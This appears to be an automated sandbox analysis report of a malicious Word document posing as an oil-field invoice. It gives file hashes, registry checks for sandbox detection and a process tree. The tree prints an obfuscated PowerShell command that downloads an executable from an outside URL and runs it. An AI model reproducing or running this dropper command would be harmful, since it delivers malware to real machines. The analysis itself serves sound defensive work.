Analysis
-
max time kernel
111s -
max time network
130s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
14-10-2021 08:09
Behavioral task
behavioral1
Sample
Invoice- 0535254 Oil_Field_4568742.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Invoice- 0535254 Oil_Field_4568742.doc
Resource
win10v20210408
General
-
Target
Invoice- 0535254 Oil_Field_4568742.doc
-
Size
55KB
-
MD5
e70320db1a53b3226e73d2b8124b2073
-
SHA1
119ac671f8030a7395030273931120b6e52b3d4d
-
SHA256
4821e3c96ac5b45216470c24fe904e41c6060e8b392ed6265807b4c59e6d39b1
-
SHA512
c964a9a959a224d938b8251b97fe3a31483d8eca5eeaa7886450e44d048ecc30c52331158865f33e14b03f03cc7ea236ae6f69b7760eb25bb414b829a59f8df6
Malware Config
Extracted
https://secure04sd.my03.com/a/oleApp13.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3136 652 cmd.exe WINWORD.EXE -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 652 WINWORD.EXE 652 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2960 powershell.exe 2960 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2960 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 652 WINWORD.EXE 652 WINWORD.EXE 652 WINWORD.EXE 652 WINWORD.EXE 652 WINWORD.EXE 652 WINWORD.EXE 652 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 652 wrote to memory of 3136 652 WINWORD.EXE cmd.exe PID 652 wrote to memory of 3136 652 WINWORD.EXE cmd.exe PID 3136 wrote to memory of 2960 3136 cmd.exe powershell.exe PID 3136 wrote to memory of 2960 3136 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Invoice- 0535254 Oil_Field_4568742.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\questionpolitics.cmd" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`ps://secure04sd.my03.com/a/oleApp13.e`xe -Destination C:\Users\Public\Documents\happyalmost.e`xe;C:\Users\Public\Documents\happyalmost.e`xe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\questionpolitics.cmdMD5
5f4bcdc965cc9739a817de56d7ca2846
SHA124d45c0d986d4ba7074da5f671d5288626dba3c3
SHA2567a16b7becdfe4e0598f559ab176ac97641ec0030b7da324b7dd2e659b20bec9d
SHA5129694cdb38eba0bccf109fe036aef3067f7d132a747738b1e7284cde76e2e90cd07bf4fce5a588cc3eee9a7ffa0731efc91692232a3e83eaad797068f6803f371
-
memory/652-117-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmpFilesize
64KB
-
memory/652-115-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmpFilesize
64KB
-
memory/652-114-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmpFilesize
64KB
-
memory/652-118-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmpFilesize
64KB
-
memory/652-120-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmpFilesize
8KB
-
memory/652-119-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmpFilesize
8KB
-
memory/652-121-0x0000028F4DE80000-0x0000028F4DE82000-memory.dmpFilesize
8KB
-
memory/652-116-0x00007FFDB5990000-0x00007FFDB59A0000-memory.dmpFilesize
64KB
-
memory/2960-274-0x000001BA76250000-0x000001BA76252000-memory.dmpFilesize
8KB
-
memory/2960-260-0x0000000000000000-mapping.dmp
-
memory/2960-275-0x000001BA76253000-0x000001BA76255000-memory.dmpFilesize
8KB
-
memory/2960-417-0x000001BA76256000-0x000001BA76258000-memory.dmpFilesize
8KB
-
memory/2960-418-0x000001BA76258000-0x000001BA76259000-memory.dmpFilesize
4KB
-
memory/3136-258-0x0000000000000000-mapping.dmp